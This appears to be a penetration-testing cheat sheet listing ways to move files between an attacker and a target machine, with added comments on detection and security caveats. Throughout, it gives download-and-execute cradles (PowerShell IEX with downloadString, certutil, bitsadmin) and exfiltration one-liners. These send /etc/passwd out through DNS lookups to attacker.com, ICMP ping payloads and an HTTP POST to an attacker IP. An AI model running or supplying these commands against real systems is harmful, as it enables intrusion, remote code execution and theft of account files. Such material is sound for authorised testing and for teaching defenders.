
File Transfer Methods

Various methods to transfer files between attacker and target machines

Linux to Linux

HTTP Server

# Python HTTP server (attacker)
# Serves the current working directory, with directory listings, over
# plaintext HTTP to anyone who can reach the port; no --bind is given, so it
# listens on all interfaces. Start it from a directory that holds only the
# files meant to be shared.
python3 -m http.server 8000
# Python 2 equivalent of the line above.
python -m SimpleHTTPServer 8000

# Download on target
# wget keeps the remote file name; curl writes to the name given with -o.
wget http://10.10.14.5:8000/file
curl http://10.10.14.5:8000/file -o file

# PHP HTTP server
# Built-in development server bound to every interface (0.0.0.0); .php files
# under the served directory are executed rather than sent as text.
php -S 0.0.0.0:8000

# Ruby HTTP server
# Serves "." on port 8000.
ruby -run -e httpd . -p 8000

# Busybox HTTP server
# -f keeps httpd in the foreground, so it ends with the terminal session.
busybox httpd -f -p 8000

Netcat

# Raw TCP copy: no authentication, no encryption and no integrity check. The
# listener accepts whatever the first client to connect sends, so compare
# checksums on both ends afterwards.
# Flags: -l listen, -v verbose, -n no DNS lookups, -p local port.
# Receiver (target)
nc -lvnp 4444 > file

# Sender (attacker)
# NOTE(review): whether nc exits on its own at end of file depends on the
# netcat variant; some need Ctrl-C once the transfer is done.
nc 10.10.10.10 4444 < file

# Alternative (sender first)
# Same transfer with the roles of listener and connector swapped, for when
# only outbound connections from the target are allowed.
# Sender (attacker)
nc -lvnp 4444 < file

# Receiver (target)
nc 10.10.14.5 4444 > file

SCP

# scp runs over SSH: the transfer is encrypted and uses the account's SSH
# authentication (password or key). It needs an SSH server on the remote side.
# Upload to target
scp file user@target:/tmp/file

# Download from target
scp user@target:/tmp/file ./file

# Recursive directory
# -r copies the directory and everything below it.
scp -r directory user@target:/tmp/

Base64

# For sessions with no file-transfer channel: the file travels as pasted text,
# so it only suits small files. Base64 grows the data by about a third.
# Encode on attacker
base64 file > file.b64

# Copy content and decode on target
# "base64_content" stands for the pasted text; -d decodes it back to bytes.
echo "base64_content" | base64 -d > file

# One-liner
# -w 0 (GNU coreutils) turns off line wrapping so the output is a single line
# that can be pasted in one piece.
cat file | base64 -w 0
# Paste output on target:
echo "paste_here" | base64 -d > file

Socat

# Receiver (target)
# Plain TCP, unauthenticated and unencrypted. fork spawns a child per
# connection and keeps listening, so the listener must be stopped by hand and
# any later client also writes into the same file. creat creates the file if
# it is missing.
# NOTE(review): no trunc option is given, so an existing longer file
# presumably keeps its old tail - use a fresh file name and verify the checksum.
socat TCP-LISTEN:4444,reuseaddr,fork OPEN:file,creat

# Sender (attacker)
socat TCP:10.10.10.10:4444 FILE:file

Windows to Linux

PowerShell Download

# All four commands fetch over plaintext HTTP, so nothing authenticates the
# server or protects the content in transit.
# Download file
# WebClient.DownloadFile writes the response straight to the given path.
powershell -c "(New-Object System.Net.WebClient).DownloadFile('http://10.10.14.5:8000/file','C:\Temp\file')"

# Alternative
# Invoke-WebRequest needs PowerShell 3.0 or later.
powershell -c "Invoke-WebRequest -Uri 'http://10.10.14.5:8000/file' -OutFile 'C:\Temp\file'"

# IWR alias
# Same cmdlet as above through its built-in alias.
powershell -c "iwr -uri 'http://10.10.14.5:8000/file' -outfile 'C:\Temp\file'"

# Download and execute
# downloadString returns the script as text and IEX (Invoke-Expression) runs
# it in the current session without writing it to disk. With script block
# logging enabled, the executed text is recorded as event 4104 in the
# Microsoft-Windows-PowerShell/Operational log, and AMSI sees it before it runs.
powershell -c "IEX(New-Object Net.WebClient).downloadString('http://10.10.14.5:8000/script.ps1')"

Certutil

# certutil is a certificate-management tool; using it to fetch arbitrary URLs
# is widely flagged by AV/EDR products.
# Download file
# -f forces the fetch and overwrite; -urlcache also leaves a copy of the
# fetched content in the user's URL cache.
certutil -urlcache -f http://10.10.14.5:8000/file file

# Alternative
# NOTE(review): no output name is given here; confirm where -split writes the
# fetched data before relying on it.
certutil -verifyctl -split -f http://10.10.14.5:8000/file

BITSAdmin

# Download file
# Creates a BITS job named "job" and waits for it to finish. BITS activity is
# recorded in the Microsoft-Windows-Bits-Client/Operational event log.
# bitsadmin itself is deprecated in favour of the BITS PowerShell cmdlets.
bitsadmin /transfer job /download /priority high http://10.10.14.5:8000/file C:\Temp\file

SMB

# Start SMB server (attacker - Linux)
# Exposes the current directory as a share named "share". No -username or
# -password is set, so the share carries no credentials; recent Windows builds
# may refuse such guest access by policy, in which case use the authenticated
# form below.
impacket-smbserver share . -smb2support

# Access from Windows
copy \\10.10.14.5\share\file C:\Temp\file

# With authentication
# The password is a command-line argument, so it is visible in the process
# list and shell history.
impacket-smbserver share . -smb2support -username user -password pass

# Access with auth
# net use also takes the password on the command line; remove the mapping
# with "net use \\10.10.14.5\share /delete" when finished.
net use \\10.10.14.5\share /user:user pass
copy \\10.10.14.5\share\file C:\Temp\file

FTP

# Start FTP server (attacker)
# -w gives anonymous users write access to the served directory, so anyone who
# can reach the port can upload or overwrite files. Binding port 21 needs
# root. FTP is cleartext, credentials included.
python3 -m pyftpdlib -p 21 -w

# Download on Windows
# Builds a command script for the non-interactive client: anonymous login,
# binary mode, fetch, quit. ftp.txt stays on disk afterwards.
echo open 10.10.14.5 21> ftp.txt
echo USER anonymous>> ftp.txt
echo anonymous>> ftp.txt
echo binary>> ftp.txt
echo GET file>> ftp.txt
echo bye>> ftp.txt
# -n disables auto-login (the script sends USER itself); -s: names the script.
ftp -v -n -s:ftp.txt

Linux to Windows

PowerShell Upload

# Upload via POST
# UploadFile sends the file as a multipart/form-data POST, so the listener has
# to implement POST; "python3 -m http.server" answers POST with 501. Plaintext
# HTTP: the file content is readable on the wire.
powershell -c "(New-Object System.Net.WebClient).UploadFile('http://10.10.14.5:8000/upload', 'C:\file')"

Netcat (Windows)

# Receiver (attacker - Linux)
# Start the listener before the sender connects. Plain TCP: no encryption and
# no authentication of the sender.
nc -lvnp 4444 > file

# Sender (Windows)
# nc.exe does not ship with Windows; it has to be present on the host already.
nc.exe 10.10.14.5 4444 < C:\file

SMB Upload

# SMB server (attacker)
# Shares the current directory as "share" with no credentials configured;
# recent Windows builds may refuse such guest access by policy.
impacket-smbserver share . -smb2support

# Upload from Windows
# Writes into the directory the server was started from.
copy C:\file \\10.10.14.5\share\file

Exfiltration Methods

DNS Exfiltration

# Encode and send via DNS
# Each base64 line of the file becomes the leftmost label of one lookup under
# attacker.com (a placeholder domain).
# Defender view: a burst of queries with long, high-entropy labels under a
# single parent domain, one dig process per line. Resolver query logs and
# egress DNS restrictions are where this gets caught.
cat /etc/passwd | base64 | while read line; do dig $line.attacker.com; done

# Receive on attacker (tcpdump)
# -n skips name resolution; "port 53" matches DNS traffic.
tcpdump -i eth0 -n port 53

ICMP Exfiltration

# Send data via ICMP
# xxd -p -c 16 emits 16 bytes of hex per line; ping -p uses each line as the
# payload fill pattern of a single echo request (-c 1).
# Defender view: echo requests whose payload changes from packet to packet,
# with one ping process spawned per 16 bytes. ICMP payload inspection or
# egress filtering of ICMP catches it.
cat file | xxd -p -c 16 | while read line; do ping -c 1 -p $line 10.10.14.5; done

# Receive on attacker
# Add -X to tcpdump to see the payload bytes rather than only packet headers.
tcpdump -i eth0 icmp

HTTP POST

# Upload via curl
# -F sends a multipart/form-data POST (which makes -X POST redundant). The body
# on the wire is the multipart envelope around the file, not the bare file
# bytes, and it travels over plaintext HTTP.
curl -X POST -F "file=@/etc/passwd" http://10.10.14.5:8000/upload

# Simple upload server (Python)
# upload_server.py
from http.server import HTTPServer, BaseHTTPRequestHandler
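class Upload(BaseHTTPRequestHandler):
    """Minimal handler that stores the raw body of each POST in ./uploaded.

    The output name is fixed and never taken from the request, so a client
    cannot choose the path; each accepted upload overwrites the previous one.
    The body is written exactly as received: a multipart/form-data POST
    (e.g. ``curl -F``) is saved with its multipart envelope, not as the bare
    file. There is no authentication and no TLS, so anyone who can reach the
    port can overwrite the file.
    """

    # Largest request body accepted. The body is read into memory in one go,
    # so an unbounded Content-Length would let any client exhaust memory.
    MAX_UPLOAD_BYTES = 64 * 1024 * 1024

    def do_POST(self):
        """Validate Content-Length, save the body to 'uploaded', answer 200.

        Responds 411 when Content-Length is absent (chunked bodies are not
        supported), 400 when it is not a non-negative integer, and 413 when it
        exceeds MAX_UPLOAD_BYTES. Nothing is written in those cases.
        """
        raw_length = self.headers.get('Content-Length')
        if raw_length is None:
            # Without a length, rfile.read() would have no safe bound.
            self.send_error(411)
            return
        try:
            length = int(raw_length)
        except ValueError:
            self.send_error(400, 'Invalid Content-Length')
            return
        if length < 0:
            # read(-1) would block until the client closes the connection.
            self.send_error(400, 'Invalid Content-Length')
            return
        if length > self.MAX_UPLOAD_BYTES:
            self.send_error(413)
            return

        data = self.rfile.read(length)
        with open('uploaded', 'wb') as f:
            f.write(data)
        self.send_response(200)
        self.end_headers()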
# An empty host string binds every interface; port 8000, plain HTTP, no
# authentication. The call blocks, serving requests until the process stops.
listen_addr = ('', 8000)
HTTPServer(listen_addr, Upload).serve_forever()

Download Cradles (Windows)

PowerShell

# IEX download and execute
# The script is fetched as a string and run by Invoke-Expression in the current
# session without being written to disk. Script block logging (event 4104,
# Microsoft-Windows-PowerShell/Operational) records the executed text.
IEX(New-Object Net.WebClient).downloadString('http://10.10.14.5/script.ps1')

# Invoke-WebRequest
# IWR is the built-in alias; the relative -OutFile lands in the current directory.
IWR -Uri http://10.10.14.5/file -OutFile file

# Start-BitsTransfer
# Runs the download as a BITS job; BITS activity is recorded in the
# Microsoft-Windows-Bits-Client/Operational event log.
Start-BitsTransfer -Source http://10.10.14.5/file -Destination C:\Temp\file

# Invoke-RestMethod
# With -OutFile the response body is saved to the file.
Invoke-RestMethod -Uri http://10.10.14.5/file -OutFile file

CMD

# PowerShell one-liner
# Starts a PowerShell child process from cmd.exe; the full command line,
# URL included, appears in process-creation logs when command-line auditing
# is enabled.
powershell -c IEX(New-Object Net.WebClient).downloadString('http://10.10.14.5/script.ps1')

# Certutil
# -f forces the fetch; a copy of the content also stays in the URL cache.
certutil -urlcache -f http://10.10.14.5/file file

# BITSAdmin
# No job type is given, so /transfer uses its default, download.
bitsadmin /transfer job http://10.10.14.5/file C:\Temp\file

VBScript

' download.vbs
' Fetches a URL with MSXML2.XMLHTTP and writes the response bytes to disk
' through ADODB.Stream.
Set objXMLHTTP = CreateObject("MSXML2.XMLHTTP")
' Third argument False = synchronous: send() returns once the response is in.
objXMLHTTP.open "GET", "http://10.10.14.5/file", False
objXMLHTTP.send()
' NOTE(review): the HTTP status is never checked, so an error page would be
' saved as if it were the file.
Set objADOStream = CreateObject("ADODB.Stream")
objADOStream.Open
' Type 1 is binary mode, so the bytes are stored without text conversion.
objADOStream.Type = 1
objADOStream.Write objXMLHTTP.ResponseBody
' Rewind to the start so the whole stream is saved.
objADOStream.Position = 0
' No save-options argument is passed; with the ADO default the call fails if
' the target file already exists.
objADOStream.SaveToFile "C:\Temp\file"
objADOStream.Close
' Release both COM objects.
Set objADOStream = Nothing
Set objXMLHTTP = Nothing
# Execute
# cscript is the console Windows Script Host, so script errors print to the
# terminal instead of opening a dialog.
cscript download.vbs

Alternative Methods

Bash TCP

# Download file
# /dev/tcp is a bash feature (not POSIX sh): fd 3 becomes a TCP socket to the
# given host and port.
exec 3<>/dev/tcp/10.10.14.5/8000
# Hand-written HTTP request; -e makes echo expand the \r\n sequences.
echo -e "GET /file HTTP/1.1\r\nHost: 10.10.14.5\r\n\r\n" >&3
# Everything the server sends is saved, status line and headers included, so
# the checksum will not match the source until those are stripped. With
# HTTP/1.1 the server may keep the connection open, leaving cat waiting.
cat <&3 > file

Python

# Download
# Python 2 only: urlretrieve lives directly in the urllib module there.
python -c "import urllib; urllib.urlretrieve('http://10.10.14.5/file', 'file')"

# Python 3
# Same call, moved to urllib.request. Plaintext HTTP, so verify the checksum
# of the saved file.
python3 -c "import urllib.request; urllib.request.urlretrieve('http://10.10.14.5/file', 'file')"

Perl

# Download
# LWP::Simple is not a core Perl module (it comes with libwww-perl), so this
# fails where that is not installed. getstore returns the HTTP status code,
# which the one-liner ignores.
perl -e 'use LWP::Simple; getstore("http://10.10.14.5/file", "file");'

Ruby

# Download
# Net::HTTP.get returns the response body as a string, which File.write saves.
# The status code is not checked, so an error page would be saved as well.
ruby -e 'require "net/http"; File.write("file", Net::HTTP.get(URI.parse("http://10.10.14.5/file")))'

PHP

# Download
# file_get_contents can only open URLs when allow_url_fopen is enabled in
# php.ini. The whole file is held in memory before it is written out.
php -r '$file = file_get_contents("http://10.10.14.5/file"); file_put_contents("file",$file);'

JavaScript (Node.js)

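# Download
# Uses the http module to match the http:// URL (the https module rejects that
# scheme). get() returns a request object, not the body, so the data is taken
# from the response callback and streamed into the file.
node -e 'require("http").get("http://10.10.14.5/file", res => res.pipe(require("fs").createWriteStream("file")))'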

Bypassing Restrictions

Download without wget/curl

# Using /dev/tcp
# bash-only: opens fd 3 as a TCP socket, sends a hand-written GET and prints
# the reply. The output starts with the HTTP status line and headers, which
# must be removed before the body is usable.
exec 3<>/dev/tcp/10.10.14.5/8000
echo -e "GET /file HTTP/1.1\r\nHost: 10.10.14.5\r\n\r\n" >&3
cat <&3

# Using telnet
# The two lines after the telnet command are typed into the session, followed
# by an empty line to end the request. telnet is a text client, so this suits
# text files; binary content may not survive intact.
telnet 10.10.14.5 8000
GET /file HTTP/1.1
Host: 10.10.14.5

Encoding

# Hex encoding
# xxd -p writes plain hex, doubling the size; -r -p turns it back into bytes.
xxd -p file > file.hex
# On target:
xxd -r -p file.hex > file

# Gzip + Base64
# Compressing first offsets base64's size growth; -w 0 (GNU coreutils) keeps
# the output on one line for pasting.
cat file | gzip | base64 -w 0
# On target:
# "base64_content" stands for the pasted text; decode, then decompress.
echo "base64_content" | base64 -d | gunzip > file

[PROTOCOL] Choose the appropriate method based on available tools and network restrictions
[TIP] Always verify file integrity after a transfer by comparing the MD5/SHA checksum of the received file with that of the source